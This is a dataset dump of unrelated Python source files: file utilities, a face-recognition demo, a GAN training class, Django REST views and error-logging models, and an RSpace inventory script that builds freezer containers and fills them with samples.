None\n\n\tif len(match_prefixes) > 0:\n\t\tfor n in reversed(epoch_nums):\n\t\t\tcurr_filenames = [os.path.basename(f) for f in model_files if 'epoch{}'.format(n) in f ]\n\t\t\tif np.all( [ np.any( [p in f for f in curr_filenames]) for p in match_prefixes] ) and n > max_epoch_num:\n\t\t\t\tmax_epoch_num = n\n\telse:\n#\t\telif len(match_prefixes) == 0 and n>max_epoch_nums\n#\t\t\tepoch_nums = [ re.search( '(?<=epoch)[0-9]*', os.path.basename(f) ).group(0) for f in model_files if ]\n\n\t\t\tmax_epoch_num = max(epoch_nums)\n\treturn max_epoch_num\n\n\ndef load_params_from_dir(in_dir):\n\twith open(os.path.join(in_dir, 'arch_params.json'), 'r') as f:\n\t\tarch_params = json.load(f)\n\twith open(os.path.join(in_dir, 'data_params.json'), 'r') as f:\n\t\tdata_params = json.load(f)\n\treturn arch_params, data_params\n","sub_path":"file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11912948","text":"import face_recognition\nimport cv2\nimport os\nimport pickle\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nNames = []\nEncodings = []\nknownFaces = '/home/kiranjoy/pyPro/face_recog/demoImages/known/'\nfor file in os.listdir(knownFaces):\n Names.append(file[:-4])\n image = face_recognition.load_image_file(os.path.join(knownFaces, file))\n Encodings.append(face_recognition.face_encodings(image)[0])\n\nwith open('train.pkl', 'wb') as f:\n pickle.dump(Names, f)\n pickle.dump(Encodings, f)\n\nNames = []\nEncodings = []\n\nwith open('train.pkl', 'rb') as f:\n Names = pickle.load(f)\n Encodings = pickle.load(f)\n\n\nunKnownFaces = '/home/kiranjoy/pyPro/face_recog/demoImages/unknown/'\nfor file in os.listdir(unKnownFaces):\n\n testImage = face_recognition.load_image_file(\n os.path.join(unKnownFaces, file))\n\n facePositions = face_recognition.face_locations(testImage)\n allEncodings = face_recognition.face_encodings(testImage, facePositions)\n\n testImage = cv2.cvtColor(testImage, cv2.COLOR_RGB2BGR)\n\n for Pos, face_encoding in zip(facePositions, allEncodings):\n name = 'unknown'\n (top, right, bottom, left) = Pos\n matches = face_recognition.compare_faces(Encodings, face_encoding)\n if True in matches:\n first_match_index = matches.index(True)\n name = 
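# --- Illustrative sketch: demonstrates the 'epoch' extraction that
# get_latest_epoch_in_dir above relies on, without touching the filesystem;
# the filenames here are invented for the example.
import re

filenames = ['net_epoch10.h5', 'net_epoch200.h5', 'other.h5']
matches = [re.search('(?<=epoch)[0-9]*', f) for f in filenames]
epoch_nums = sorted({int(m.group(0)) for m in matches if m and m.group(0)})
print(epoch_nums[-1] if epoch_nums else None)  # -> 200
# --- end sketch ---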
Names[first_match_index]\n cv2.rectangle(testImage, (left, top), (right, bottom), (0, 0, 255), 2)\n cv2.putText(testImage, name, (left, top-6),\n font, .75, (255, 0, 255), 2)\n cv2.imshow('frame', testImage)\n if cv2.waitKey(0) == ord('q'):\n cv2.destroyAllWindows()\n break\n","sub_path":"face_recog/face-2.py","file_name":"face-2.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"490936874","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom generators import GeneratorSN\nfrom discriminators import DiscriminatorSN\nfrom utils import ContentLoss, TVLoss\n\n\nclass OnewayGAN:\n\n def __init__(self, image_size):\n\n self.generator = GeneratorSN().cuda()\n self.discriminator = DiscriminatorSN(image_size, num_input_channels=3).cuda()\n\n self.content_criterion = ContentLoss().cuda()\n self.tv_criterion = TVLoss().cuda()\n self.realism_criterion = nn.BCEWithLogitsLoss().cuda()\n\n betas = (0.0, 0.9)\n self.g_optimizer = optim.Adam(self.generator.parameters(), lr=1e-4, betas=betas)\n self.d_optimizer = optim.Adam(self.discriminator.parameters(), lr=4e-4, betas=betas)\n\n def train_step(self, x, y, update_generator=True):\n\n for p in self.discriminator.parameters():\n p.requires_grad = False\n\n y_fake = self.generator(x)\n content_loss = self.content_criterion(x, y_fake)\n tv_loss = self.tv_criterion(y_fake)\n\n batch_size = x.size(0)\n pos_labels = torch.ones(batch_size, dtype=torch.float, device=x.device)\n neg_labels = torch.zeros(batch_size, dtype=torch.float, device=x.device)\n realism_generation_loss = self.realism_criterion(self.discriminator(y_fake), pos_labels)\n\n if update_generator:\n\n generator_loss = content_loss + 100.0 * tv_loss\n generator_loss += 5e-2 * realism_generation_loss\n\n self.g_optimizer.zero_grad()\n generator_loss.backward()\n self.g_optimizer.step()\n\n for p in self.discriminator.parameters():\n p.requires_grad = True\n\n targets = torch.cat([pos_labels, neg_labels], dim=0)\n is_real_real = self.discriminator(y)\n is_fake_real = self.discriminator(y_fake.detach())\n logits = torch.cat([is_real_real, is_fake_real], dim=0)\n discriminator_loss = self.realism_criterion(logits, targets)\n\n self.d_optimizer.zero_grad()\n discriminator_loss.backward()\n self.d_optimizer.step()\n\n loss_dict = {\n 'content': content_loss.item(),\n 'tv': tv_loss.item(),\n 'realism_generation': realism_generation_loss.item(),\n 'discriminator': discriminator_loss.item(),\n }\n return loss_dict\n\n def save_model(self, model_path):\n torch.save(self.generator.state_dict(), model_path + '_generator.pth')\n torch.save(self.discriminator.state_dict(), model_path + '_discriminator.pth')\n","sub_path":"oneway_gan.py","file_name":"oneway_gan.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281503271","text":"from . 
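# --- Illustrative sketch: compare_faces() in the loop above is essentially a
# euclidean-distance threshold on 128-dim encodings (0.6 is the library's
# default tolerance). Dummy vectors stand in for real encodings so this runs
# without any image files.
import numpy as np

known_encodings = [np.zeros(128), np.ones(128)]
known_names = ['alice', 'bob']
probe = np.full(128, 0.99)
matches = [np.linalg.norm(probe - k) <= 0.6 for k in known_encodings]
name = 'unknown'
if True in matches:
    name = known_names[matches.index(True)]
print(name)  # -> 'bob'
# --- end sketch ---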
import models\nimport base64\nfrom django.conf.urls.static import static\nimport os\nfrom dateutil.parser import parse\n \nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework.status import *\nimport json\nimport requests\n\ncount_requests = [0]\ncrash_flag = False\n#user_service_ip = \"http://localhost:8080\"\n\ndef dt_tm(dt, s2o=None, o2s=None):\n\tprint(dt)\n\tif s2o == True:\n\t\tdt = dt[:10]+\" \"+dt[17:19]+\":\"+dt[14:16]+\":\"+dt[11:13]\n\t\tprint(dt)\n\t\treturn parse(dt)\n\tif o2s == True:\n\t\treturn dt.strftime(\"%d-%m-%Y:%S-%M-%H\")\n\n\n\n@api_view(['GET', 'POST'])\ndef ListAll_Add_Category(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tif request.method == \"GET\":\n\t\t\tprint(\"\\nListAllCategory :\", request.data, \"\\n\")\n\n\t\t\tod = dict()\n\t\t\tfor i in models.category.objects.all():\n\t\t\t\tod[i.categoryName] = i.categoryCount\n\t\t\t\t\n\t\t\tif len(od) == 0:\n\t\t\t\treturn Response({}, status=HTTP_204_NO_CONTENT)\n\t\t\t\t\n\t\t\treturn Response(od, status=HTTP_200_OK)\n\n\t\t#to add a category\n\t\telif request.method == 'POST':\n\t\t\tdata = request.data\n\t\t\tprint(\"\\nAddCategory :\", data, \"\\n\")\t\n\t\t\t\n\t\t\ttry:\n\t\t\t\tif len(data[0]) == 0:\n\t\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\t\t\n\t\t\t\tmodels.category.objects.create(categoryName=data[0])\n\t\t\t\treturn Response({}, status=HTTP_201_CREATED)\n\t\t\t\t\n\t\t\texcept Exception as e:\n\t\t\t\t\tprint(\"Exception :\", e)\n\t\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['DELETE'])\ndef RemoveCategory(request, categoryName):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\nRemove category :\", data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tps = models.category.objects.get(pk=categoryName).delete()\n\t\t\treturn Response({}, status=HTTP_200_OK)\n\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef ListActsInCategory(request, categoryName, *args, **kwargs):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tprint(\"\\nListActs :\", request.data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tcategory = models.category.objects.get(pk = categoryName)\n\t\t\tstartRange, endRange = request.GET.get('start'), request.GET.get('end')\n\n\t\t\tif category.categoryCount >= 100:\n\t\t\t\treturn Response({}, status=HTTP_413_REQUEST_ENTITY_TOO_LARGE)\n\t\t\t\n\t\t\tif category.categoryCount == 0 or len(request.data) != 0:\n\t\t\t\treturn Response([], status=HTTP_204_NO_CONTENT)\n\n\t\t\tli = []\n\t\t\tfor i in models.act.objects.filter(categoryName=categoryName).order_by('-timestamp'):\n\t\t\t\tod = dict()\t\n\t\t\t\tod['actId'] = i.actId\n\t\t\t\tod['username'] = i.username\n\t\t\t\tod['timestamp'] = dt_tm(i.timestamp, o2s=True)\n\t\t\t\tod['caption'] = i.caption\n\t\t\t\tod['upvotes'] = i.upvotes\n\t\t\t\tod['imgB64'] = i.imgB64\n\t\t\t\tli.append(od)\n\t\t\t\n\t\t\t#if no range is specified in the url\n\t\t\tif startRange == None or endRange == None:\n\t\t\t\treturn Response(li, status=HTTP_200_OK)\t\t\t\n\t\t\t\n\t\t\t#if range in specified in the 
url\n\t\t\telse:\n\t\t\t\tif int(endRange) - int(startRange) + 1 > 100:\n\t\t\t\t\treturn Response({}, status=HTTP_413_REQUEST_ENTITY_TOO_LARGE)\n\t\t\t\t\n\t\t\t\tif int(endRange) <= 0 or int(startRange) <= 0 or int(endRange) > category.categoryCount:\n\t\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\n\t\t\t\treturn Response(li[int(startRange):int(endRange)+1], status=HTTP_200_OK)\n\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_204_NO_CONTENT)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef CountActs(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\t#to count number of acts across all categories\n\t\tprint('\\n CountActs', request.data, '\\n')\n\t\tcount_requests[0] += 1\n\n\t\tn = 0\n\t\tfor i in models.category.objects.all():\n\t\t\tn += i.categoryCount\n\n\t\treturn Response([n], status=HTTP_200_OK)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef NumberOfActsInCategory(request, categoryName):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tprint(\"\\n NumberOfActsInCategory :\", request.data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tcategory = models.category.objects.get(pk = categoryName)\n\t\t\treturn Response([category.categoryCount], status=HTTP_200_OK)\n\t\t\n\t\texcept Exception as e:\n\t\t\treturn Response([], status=HTTP_204_NO_CONTENT)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef UpvoteAct(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\n UpvoteAct :\", data, \"\\n\")\t\n\t\t\n\t\tif not isinstance(data[0], int):\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\t\n\t\t\tp = models.act.objects.get(pk = data[0])\n\t\t\tp.upvotes += 1\n\t\t\tp.save()\n\t\t\treturn Response([], status=HTTP_200_OK)\n\t\t\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['DELETE'])\ndef RemoveAct(request, actId):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\nRemoveAct :\", data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tp = models.act.objects.get(pk = int(actId))\n\t\t\tp.categoryName.categoryCount -= 1\n\t\t\tp.categoryName.save()\n\t\t\tp.delete()\n\t\t\treturn Response({}, status=HTTP_200_OK)\n\t\t\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef UploadAct(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\nUploadActs :\", data, \"\\n\")\t\n\n\t\t#user validation\n\t\ttry:\n\t\t\t#headers = {\"Origin\":\"3.210.166.12\", \"Accept\":\"application/json\"}\n\t\t\theaders = {\"Accept\":\"application/json\"}\n\t\t\t#headers = {}\n\t\t\tusers = requests.get(\"http://100.25.106.87/api/v1/users\",data=\"{}\", headers=headers).text\n\t\t\tprint(\"all users : \" , users)\n\t\texcept requests.exceptions.ConnectionError:\n\t\t\tprint(\"ConnectionError\")\n\t\t\treturn Response({}, status = 
HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\tif data[\"username\"] not in users:\n\t\t\t\tprint(\"username not found in\", users)\n\t\t\t\treturn Response({}, status = HTTP_400_BAD_REQUEST)\n\t\texcept Exception as e:\t\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\t#base 64 string validation\n\t\t\tif base64.b64encode(base64.b64decode(data['imgB64'])).decode() != data['imgB64']:\n\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\tif not isinstance(data['actId'], int) or 'upvotes' in data:\n\t\t\t\treturn Response({}, status = HTTP_400_BAD_REQUEST)\n\n\t\t\tformatted_timestamp = dt_tm(data['timestamp'], s2o=True)\n\t\t\tcategoryName = models.category.objects.get(pk=data['categoryName'])\n\t\t\tc = models.act.objects.create(actId=int(data['actId']), username=data[\"username\"], timestamp=formatted_timestamp, caption=data['caption'], categoryName=categoryName, imgB64=data['imgB64'])\n\t\t\tc.categoryName.categoryCount += 1\n\t\t\tc.categoryName.save()\n\t\t\treturn Response({}, status=HTTP_201_CREATED)\n\t\t\n\t\texcept Exception as e:\t\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET', 'DELETE'])\ndef count(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tprint(\"\\ncount request received\", request.data, '\\n')\n\n\t\tif request.method == 'GET':\n\t\t\treturn Response(count_requests, status=HTTP_200_OK)\n\n\t\tif request.method == 'DELETE':\n\t\t\tcount_requests = [0]\n\t\t\treturn Response({}, status=HTTP_200_OK)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef health(request):\n\tglobal crash_flag\n\tprint(\"\\nhealth request received\", request.data, \"\\n\")\n\tif (crash_flag == False):\n\t\treturn Response({}, status=HTTP_200_OK)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef crash(request):\n\tglobal crash_flag\n\tprint(\"\\ncrash request received\", request.data, \"\\n\")\n\tcrash_flag = True\n\treturn Response({}, status=HTTP_200_OK)\n\n'''\n{\n\"actId\": 1234,\n\"username\": \"john_doe\",\n\"timestamp\": \"23-12-2323:45-34-22\",\n\"caption\": \"caption text\",\n\"categoryName\": \"cat1\",\n\"imgB64\": \"bGlmZSBpcyBncmVhdA==\"\n}\n'''\n","sub_path":"serverfiles/dockerized_apps/acts/acts/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"389295349","text":"import sys\nimport traceback\nimport json\nimport os\nimport logging\nfrom hashlib import md5\n\nfrom django.utils import timezone\nfrom django.db.models import Model\nfrom django.db import models\nfrom django.http import HttpResponse\nfrom django.core.cache import cache\nfrom django.core.exceptions import MultipleObjectsReturned\nfrom google.appengine.ext import db\n\nfrom .utils import construct_request_json\n\nEVENT_LEVEL_WARNING = \"WARNING\"\nEVENT_LEVEL_INFO = \"INFO\"\nEVENT_LEVEL_ERROR = \"ERROR\"\n\nEVENT_LEVEL_CHOICES = [\n (EVENT_LEVEL_ERROR, \"Error\"),\n (EVENT_LEVEL_WARNING, \"Warning\"),\n (EVENT_LEVEL_INFO, \"Info\")\n]\n\nclass Error(Model):\n exception_class_name = models.CharField(max_length=255)\n summary = models.CharField(max_length=500)\n file_path = models.TextField()\n hashed_file_path = models.CharField(max_length=32)\n\n 
line_number = models.PositiveIntegerField()\n is_resolved = models.BooleanField()\n event_count = models.PositiveIntegerField(default=0)\n last_event = models.DateTimeField(auto_now_add=True)\n level = models.CharField(max_length=100, choices=EVENT_LEVEL_CHOICES, default=EVENT_LEVEL_ERROR)\n\n class Meta:\n unique_together = [\n ('exception_class_name', 'hashed_file_path', 'line_number')\n ]\n\n @staticmethod\n def hash_for_file_path(file_path):\n return md5(file_path).hexdigest()\n\n def save(self, *args, **kwargs):\n self.hashed_file_path = Error.hash_for_file_path(self.file_path)\n super(Error, self).save(*args, **kwargs)\n\nclass Event(models.Model):\n error = models.ForeignKey(Error, related_name=\"events\")\n created = models.DateTimeField(auto_now_add=True)\n logged_in_user_email = models.EmailField()\n\n request_method = models.CharField(max_length=10)\n request_url = models.TextField()\n request_querystring = models.TextField()\n request_repr = models.TextField()\n request_json = models.TextField()\n\n stack_info_json = models.TextField() #JSON representation of the stack, [{ 'locals' : {}, 'source': '' }]\n\n app_version = models.CharField(max_length=64, default='Unknown')\n\n @property\n def stack_info(self):\n if self.stack_info_json:\n return json.loads(self.stack_info_json)\n else:\n return {}\n\n @property\n def request(self):\n if self.request_json:\n return json.loads(self.request_json)\n else:\n return {}\n\n @classmethod\n def log_event(cls, request, response=None, exception=None):\n from django.views.debug import ExceptionReporter\n\n stack_info = {}\n if exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n summary = \"{0}: {1}\".format(exception.__class__.__name__, unicode(exception))\n lineno = traceback.tb_lineno(exc_traceback)\n\n stack = traceback.extract_tb(exc_traceback)\n unique_path = \"|\".join(line[0] for line in stack)\n path = stack[-1][0]\n\n try:\n reporter = ExceptionReporter(request, is_email=False, *(exc_type, exc_value, exc_traceback))\n django_data = reporter.get_traceback_data()\n\n stack_info[\"frames\"] = django_data.get(\"frames\", [])\n\n #Traceback objects aren't JSON serializable, so delete them\n for frame in stack_info[\"frames\"]:\n if \"tb\" in frame:\n del frame[\"tb\"]\n\n stack_info[\"lastframe\"] = django_data.get(\"lastframe\", {})\n except Exception:\n logging.exception(\"Unable to get html traceback info for some reason\")\n level = EVENT_LEVEL_ERROR\n\n else:\n summary = \"{0} at {1}\".format(response.status_code, request.path)\n lineno = 0\n path = \"?\".join([request.path, request.META.get('QUERY_STRING')])\n unique_path = path\n exception = HttpResponse()\n level = EVENT_LEVEL_WARNING if response.status_code == 404 else EVENT_LEVEL_INFO\n\n exception_name = exception.__class__.__name__\n\n # unique_path is either the full URL or the combined paths from the\n # entire stack trace.\n path_hash = Error.hash_for_file_path(unique_path)\n\n #We try to get from the cache first because on the App Engine datastore\n #we'll get screwed by eventual consistency otherwise\n CACHE_KEY = \"|\".join([exception_name, path_hash, str(lineno)])\n error = cache.get(CACHE_KEY)\n if error:\n created = False\n else:\n try:\n error, created = Error.objects.get_or_create(\n exception_class_name=exception_name,\n hashed_file_path=path_hash,\n line_number=lineno,\n defaults={\n 'file_path': path,\n 'level': level,\n 'summary': summary,\n 'exception_class_name': exception.__class__.__name__ if exception else \"\"\n }\n )\n except 
MultipleObjectsReturned:\n #FIXME: Temporary hack for App Engine If we created dupes, this de-dupes them\n errors = Error.objects.filter(exception_class_name=exception_name, hashed_file_path=path_hash, line_number=lineno).all()\n\n max_errors = 0\n to_keep = None\n to_remove = []\n for error in errors:\n num_events = error.events.count()\n if max_errors < num_events:\n # Store the error with the most events\n to_keep = error\n max_errors = num_events\n else:\n #this error doesn't have the most events, so mark it for removal\n to_remove.append(error)\n\n assert to_keep\n\n logging.warning(\"Removing {} duplicate errors\".format(len(to_remove)))\n for error in to_remove:\n error.events.all().update(error=to_keep)\n error.delete()\n\n error = to_keep\n\n cache.set(CACHE_KEY, error)\n\n @db.transactional(xg=True)\n def txn(_error):\n _error = Error.objects.get(pk=_error.pk)\n\n event = Event.objects.create(\n error=_error,\n request_repr=repr(request).strip(),\n request_method=request.method,\n request_url=request.build_absolute_uri(),\n request_querystring=request.META['QUERY_STRING'],\n logged_in_user_email=getattr(getattr(request, \"user\", None), \"email\", \"\"),\n stack_info_json=json.dumps(stack_info),\n app_version=os.environ.get('CURRENT_VERSION_ID', 'Unknown'),\n request_json=construct_request_json(request)\n )\n\n _error.last_event = timezone.now()\n _error.event_count += 1\n _error.save()\n return event\n\n return txn(error)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"391342920","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 28 20:04:29 2022\n\n@author: richardadams\n\"\"\"\n\n#%%\nimport sys, time\nimport rspace_client\n\ncli = rspace_client.utils.createInventoryClient()\nfrom rspace_client.inv.inv import (\n GridContainer,\n InventoryClient,\n ByRow,\n ByColumn,\n SamplePost,\n GridContainerPost,\n)\n\n#%%\n\n\nclass FreezerCreator:\n def __init__(\n self,\n cli,\n shelves_per_freezer: int,\n racks_per_shelf: int,\n trays_per_rack: int,\n boxes_per_tray: int,\n ):\n self.shelves_per_freezer = shelves_per_freezer\n self.racks_per_shelf = racks_per_shelf\n self.trays_per_rack = trays_per_rack\n self.boxes_per_tray = boxes_per_tray\n self.cli = cli\n\n def create_freezer(self, name: str):\n print(\"Creating freezer\", file=sys.stderr)\n root = self.create_tier(1, name, self.shelves_per_freezer, 1)[0]\n\n ## shelves\n print(f\"Creating {shelves_per_freezer} shelves\", file=sys.stderr)\n shelves = self.create_tier(\n self.shelves_per_freezer, \"shelf\", self.racks_per_shelf, 1\n )\n self.add_to_parent_tier([root], 1, self.shelves_per_freezer, shelves)\n\n ### racks\n racks_total = racks_per_shelf * shelves_per_freezer\n print(f\"Creating {racks_total} racks\", file=sys.stderr)\n racks = self.create_tier(racks_total, \"rack\", self.trays_per_rack, 1)\n self.add_to_parent_tier(\n shelves, self.shelves_per_freezer, self.racks_per_shelf, racks\n )\n\n ### Trays\n trays_total = racks_total * trays_per_rack\n print(f\"Creating {trays_total} trays\", file=sys.stderr)\n trays = self.create_tier(trays_total, \"tray\", self.boxes_per_tray, 1)\n self.add_to_parent_tier(racks, self.racks_per_shelf, self.trays_per_rack, trays)\n\n ### Boxes\n boxes_total = trays_total * boxes_per_tray\n print(f\"Creating {boxes_total} boxes\", file=sys.stderr)\n boxes = self.create_tier(boxes_total, \"box\", 8, 12, 
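# --- Illustrative sketch: the Error model above dedupes on (exception class,
# md5 of the joined stack paths, line number). This is the same key
# construction in isolation; the values are invented, and .encode() is used
# because hashlib takes bytes in Python 3.
from hashlib import md5

exception_name = 'ValueError'
unique_path = '/app/views.py|/app/utils.py'  # stack paths joined with '|'
path_hash = md5(unique_path.encode()).hexdigest()
cache_key = '|'.join([exception_name, path_hash, str(42)])
print(cache_key)  # ValueError|<32 hex chars>|42
# --- end sketch ---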
store_samples=True)\n self.add_to_parent_tier(trays, self.trays_per_rack, self.boxes_per_tray, boxes)\n\n return {\n \"freezer\": [root],\n \"shelves\": shelves,\n \"racks\": racks,\n \"trays\": trays,\n \"boxes\": boxes,\n }\n\n def create_tier(self, n, name_prefix, rows, columns, store_samples=False):\n rc = []\n for i in range(0, n, 100):\n # build each batch of up to 100 containers with unique names\n posts = []\n for j in range(i, min(n, i + 100)):\n c_post = GridContainerPost(\n f\"{name_prefix}-{j}\", rows, columns, can_store_samples=store_samples\n )\n posts.append(c_post)\n\n results = self.cli.bulk_create_container(*posts)\n if not results.is_ok():\n raise Exception(\"creating didn't work\")\n items = [c[\"record\"][\"globalId\"] for c in results.success_results()]\n rc.extend(items)\n\n return rc\n\n def add_to_parent_tier(self, parents, parents_per_gp, items_per_parent, items):\n for j in range(len(parents)):\n k = items_per_parent\n rack_slice = items[j * k : (j * k) + k]\n br = ByRow(1, 1, 1, k, *rack_slice)\n self.cli.add_items_to_grid_container(parents[j], br)\n\n\n#%%\n### Configure the size of the freezer here (or ask for input)\nprint(\n \"Please enter the number of shelves, racks, trays and boxes to create. Boxes are 12 x 8\"\n)\nshelves_per_freezer = int(input(\"Number of shelves? (1-5)\"))\nracks_per_shelf = int(input(\"Number of racks per shelf? (1-5)\"))\ntrays_per_rack = int(input(\"Number of trays per rack? (1-5)\"))\nboxes_per_tray = int(input(\"Number of boxes per tray? (1-4)\"))\n\nparams = (shelves_per_freezer, racks_per_shelf, trays_per_rack, boxes_per_tray)\nfor i in params:\n if i < 1 or i > 5:\n raise ValueError(f\"Input arguments {params} out of range\")\nbox_cols = 12\nbox_rows = 8\nfreezer_name = (\n f\"-80:{shelves_per_freezer}x{racks_per_shelf}x{trays_per_rack}x{boxes_per_tray}\"\n)\nuser_freezer_name = input(f\"Freezer name? 
( default = {freezer_name})\")\nif len(user_freezer_name) > 0:\n freezer_name = user_freezer_name\nprint(\"Creating freezer\", file=sys.stderr)\nfreezerFactory = FreezerCreator(\n cli, shelves_per_freezer, racks_per_shelf, trays_per_rack, boxes_per_tray\n)\nfreezer = freezerFactory.create_freezer(freezer_name)\n\n\n#%%\nsamples_created = 0\ntotal_samples_to_create = len(freezer[\"boxes\"]) * box_cols\nprint(f\"Creating {total_samples_to_create} samples...\", file=sys.stderr)\nfor box in freezer[\"boxes\"]:\n st = time.perf_counter()\n print(f\"Creating samples for {box}\", file=sys.stderr)\n posts = [SamplePost(f\"s{i}\", subsample_count=box_rows) for i in range(box_cols)]\n resp = cli.bulk_create_sample(*posts)\n col = 1\n samples_created = samples_created + box_cols\n print(\n f\" created {box_cols} samples / {total_samples_to_create}\", file=sys.stderr,\n )\n\n ## we can move 12 samples at a time\n ss_ids = []\n for result in resp.data[\"results\"]:\n sample = result[\"record\"]\n s_ids = [ss[\"globalId\"] for ss in sample[\"subSamples\"]]\n ss_ids.extend(s_ids)\n print(f\"moving {box_cols} samples to {box}\", file=sys.stderr)\n gp = ByColumn(col, 1, box_cols, box_rows, *ss_ids)\n cli.add_items_to_grid_container(box, gp)\n stop = time.perf_counter()\n print(f\"Filling {box} took {(stop - st):.2f}s\", file=sys.stderr)\nprint(\"COMPLETED\", file=sys.stderr)\n","sub_path":"examples/freezer.py","file_name":"freezer.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"261299871","text":"'''a=input(\"Enter t-he string\")\r\nb=a.replace(\"plus\",\"+\").replace(\"mul\",\"*\").replace(\"minus\",\"-\").replace(\"div\",\"/\")\r\nprint(eval(b))'''\r\n\r\n'''name=input(\"Enter the String: \")\r\nDOB=input(\"Enter DOB: \")\r\nprint(\"Hiii...{n} {d} {i:.3f} Welcome to BITA\".format(n=name,d=DOB,i=6.66666666))'''\r\n\r\n'''print('/{:<10}/{:^10}/{:>12}'.format(\"welcome\",\"to\",\"BITA\"))'''\r\n\r\n'''a=[]\r\nc=0\r\nfor i in range(1001):\r\n if i%3==0 or i%5==0:\r\n a.append(i)\r\n c+=1\r\nprint(a)\r\nprint(c)\r\nprint(len(a))\r\nprint(max(a))\r\nprint(min(a))'''\r\n\r\n'''v=['a','e','i','o','u']'''\r\n\r\n'''a=[1,[2,3,4],[5,6,7]]\r\nprint(a[1])\r\nprint(a[1][2])'''\r\n\r\n'''a=[[i for i in range(3)]for j in range(3)]\r\nprint(a)'''\r\n\r\n'''a=[i for i in range(1001) if not i%3 or not i%5]\r\nprint(a)'''\r\n\r\n'''a=[1,2,3,4]\r\nb=[1,'jghj',6]\r\na.extend(b)\r\nprint(a)\r\na.append(b)\r\nprint(a)'''\r\n\r\n'''l=[9,6,42,30]\r\nfor i in l:\r\n for j in i:\r\n if i>j==0:\r\n t=i\r\n i=j\r\n j=t\r\n 